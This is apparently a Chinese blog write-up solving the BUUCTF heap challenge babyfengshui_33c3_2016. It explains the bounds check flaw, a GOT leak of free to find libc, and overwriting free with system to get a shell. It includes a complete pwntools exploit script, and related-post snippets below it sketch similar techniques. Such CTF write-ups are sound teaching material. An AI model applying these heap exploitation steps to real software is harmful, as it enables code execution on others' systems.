babyfengshui__BUUCTF

最新推荐文章于 2024-01-24 03:30:33 发布
最新推荐文章于 2024-01-24 03:30:33 发布
阅读量568 收藏
点赞数 1
分类专栏: # BUUCTF_pwn 文章标签: BUUCTF pwn 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/101691085
版权

其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流
我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑
好像这个题在攻防世界也存在
做题思路
1.查看安全机制/文件信息
2.分析IDA,梳理思路很重要
3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢)
4.编写EXP文件

1.安全机制

在这里插入图片描述运行
在这里插入图片描述0:添加一个用户 1:删除用户 2:显示用户 3:更新用户描述 4:退出
在这里插入图片描述这里要注意是否开启系统随机化,不方便本地测试(系统随机化其实都是默认开启的)

2.IDA分析

0.add
在这里插入图片描述1.free
在这里插入图片描述2.play
在这里插入图片描述
3.update
在这里插入图片描述update存在问题,这里是限制了我们的数据不能超过自定义的范围,不过还有一种方法可以绕过,就是释放空间再利用。这里还要注意一点就是上面的free函数,因为free没有将*ptr置为null,所以一直会存在这么一个指针

3.漏洞利用

第一按照数据结构画结构体(见谅)

**内容_chunk**	 #自定义size
{	
	pre_size
	size
	content
}
**描述_chunk** 	#这里固定大小为0x88
{
	size
	*ptr   #这里是很关键的一点,这里是指向内容_chunk的指针
	content
}

自己也做了好几道堆得题了,发现一个道理,只要知道了libc_base,就已经成功了一大半了
思路如下
0.写入/bin/sh\x00
1.泄露libc的地址(利用free的地址)

  1. 修改*ptr指针指向free的地址,泄露出got表的真实地址
  2. 在后面利用*ptr指针改为system地址,意思就是free的地址改为了system
  3. 当再次free的时候就触发了get shell

重点就是利用结构体的*ptr

编写EXP

经验

  1. 首先是写程序的流程,要注意用context.log_level = 'debug'可以及时的发现自己的错误
  2. 多利用sendlineafter可以很多的减少代码,不过有时候也要检查,自己遇到个别时候有不能用的时候
  3. 写完框架,要利用添加->打印->修改->释放的流程跑一边,检测框架是否有问题
  4. 这里要注意在自己本地测试不能用他的libc,因为程序调用的是自己本地的libc,当打通本地后利用他的libc去get shell!
  5. 我的script中的name每次都需要些用a*8去填充,你也可以在框架里面一次写入减少后面的变量传入
#!/usr/bin/env python
from pwn import*
context.log_level = 'debug'
p = process("./babyfengshui_33c3_2016")
#p = remote("pwn.buuoj.cn",20002)
elf = ELF("./babyfengshui_33c3_2016")
libc = ELF("./libc.so.6")  #libc = libc
def add(size,name,size_1,text):
	p.sendlineafter("Action: ",str(0))
	p.sendlineafter("size of description: ",str(size))
	p.sendlineafter("name: ",name)
	p.sendlineafter("text length: ",str(size_1))
	p.sendlineafter("text: ",text)
def delete(index):
	p.sendlineafter("Action: ",str(1))
	p.sendlineafter("index: ",str(index))
def play(index):
	p.sendlineafter("Action: ",str(2))
	p.sendlineafter("index: ",str(index))
def edit(index,leng,text):
	p.sendlineafter("Action: ",str(3))
	p.sendlineafter("index: ",str(index))
	p.sendlineafter("text length: ",str(leng))
	p.sendlineafter("text: ",text)
print '====add===='
add(128,"a"*8,30,"b"*8)  #0
add(128,"a"*8,30,"b"*8)  #1
print '====add bin_sh ===='
add(8,'a'*8,8,'/bin/sh\x00')  #2
delete(0)
gdb.attach(p)
print '====link libc===='
add(0x100,"a"*8,0x19c,"b"*0x198+p32(elf.got['free'])) #0x198后刚好是指向index =1 的content
play(1)  #这里刚好就将*ptr指向的free对应地址的内容给打印出来
p.recvuntil("description: ")
free_addr = u32(p.recv(4))
libc_base = free_addr - libc.symbols['free'] 
success("[+]---->free_addr = "+hex(free_addr))
success("[+]---->libc_base = "+hex(libc_base))
system_addr = libc_base + libc.symbols['system']
print '====get_shell===='
edit(1,4,p32(system_addr)) #1
delete(2)
#gdb.attach(p)
p.interactive()
Jc^
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
babyfengshui(xctf)
weixin_43868725的博客
08-21 195
0x0 程序保护和流程 保护: 流程: main() add_user() 连续分配了两个块,并将第一次分配的块的指针存入第二次分配的块的fd字段,bk字段开始存放name,之后调用了update_user() 输入完length之后要经过判断,需要第一次分配的块的数据段的地址加上输入的长度的值必须小于第二次分配的块的数据段的地址减4的值才能输入text。 delete_user() 根据索引分别释放两个块,再将指向第二次分配块的指针清零。 display_user() 根据索引输
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8487
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 789
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是溢出,现在ctf主要的考点都已经转移到了溢出了,这个题目作为溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
babyfengshui_33c3_2016题解
coco的博客
12-09 892
这道题还是比较基础的题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 279
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
buuctf babyfengshui
doudoudedi
10-07 231
日常题不会我啃了2天是个硬骨头~~ 这道题 直接套调试过程 add(0x80,0x80,'aaa') add(0x80,0x80,'bbb') add(0x8,0x8,'/bin/sh') 清楚的看见chunk的位置改变了原来相邻的chunk发生的变化然后我们就绕过了 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1]...
BUUCTF 派大星的烦恼
awxnutpgs545144602的博客
08-16 1492
这道题做的累死了,题目关键在于思路,这里将做题的完整思路记下来。题目给了一张bmp,用010打开可以看出题目关键就在于这一段D和“,保存出来 "DD"DD""""D"DD""""""DD"""DD"DD""D""DDD""D"D"DD""""""DD""D""""DD"D"D"DD""""D"DD""D"""DD"""""DDD""""D"DD"""D"""DD"""D""DD...
CG-CTF web部分wp
awxnutpgs545144602的博客
08-16 265
bin不动了,学学webWEB1,签到1f12,得到flag2,签到2给了输入窗口和密码,但输入后却显示错误,查看源码,发现对输入长度进行了限制,改下长度,得到flag3,md5 collision给了一段php,但我没有学过,经过百度,得知是考察PHP弱类型,$md51 == $md52处只要传人md5值0e\d+形式即可http://chinalover.sinaapp.com/we...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2563
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuctf babyrop
carol2358的博客
04-08 569
pwn菜鸡争取一天写一道吧,记录一下做题过程,方便复现 先checksec ida f5 大致的流程就是先生成一个随机数,然后将这个随机数放入buf,再把buf传到71F 在71F里,buf变成a1,把a1放入s,然后往71F的buf里输入数据,这一步要注意,我们要做的是通过传入数据,把v5覆盖掉,因为返回值是v5,而v5和buf的关系在stack里是这样的 所以我们传入7个以上的字节(...
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3551
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTFpwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2339
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
CTF-web 第三部分 代码审计
iamsongyu的博客
10-09 5843
http://www.mxcz.net/tools/rot13.aspx rot-13加密解密 http://www.zjslove.com/3.decode/ 凯撒 当铺 倒叙 维吉尼亚密码 实际上就是阅读有关的校验代码,人为构造特殊的输入或者参数才能拿到flag。需要了解一般的变量命名,判断语句和常用函数等,对于函数的执行流程还是很容易理解的,编程的关键点如下: 一些基本的语法含义 php编程...
BUUCTF - PWN】babyrop
古月浪子的博客
03-25 1738
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
(攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1683
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
BUUCTF MISC部分题目wp
awxnutpgs545144602的博客
08-16 3752
MISC这里是平台上比较简单的misc,都放在一起,难一些的会单独写1,二维码图片里藏了一个压缩包,用binwalk -e分离,提示密码为4个数字,fcrackzip -b -c1 -l 4 -u 得到密码7639得到flag:CTF{vjpw_wnoei},将ctf换为flag提交 2,基础爆破rar四位密码,直接爆破,得到密码2563,打开flag.txt为base64加密,解...
BUU刷题 normal_heap
清霂的博客
05-13 132
目录babyheap_0ctf_2017babyfengshui_33c3_2016 babyheap_0ctf_2017 #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "babyheap_0ctf_2017" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF
xctf攻防世界pwn level0的断点调试
你的小粉丝的博客
07-24 805
将level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...
Fengshui-[SZU_B40]
weixin_30640291的博客
07-30 111
Description Fengshui is an ancient subject in Chinese tradition. Someone considers it as science and someone criticizes it as blind faith. Who knows! However, in modern days, everyone should respect ...
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
最新发布
2301_79326813的博客
01-24 640
又是一道题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建块,free释放块,show查看块内容,fill填充块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+块地址>=相邻0x80块的地址时会被强制退出必须要 我们输入的字节大小+块地址

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值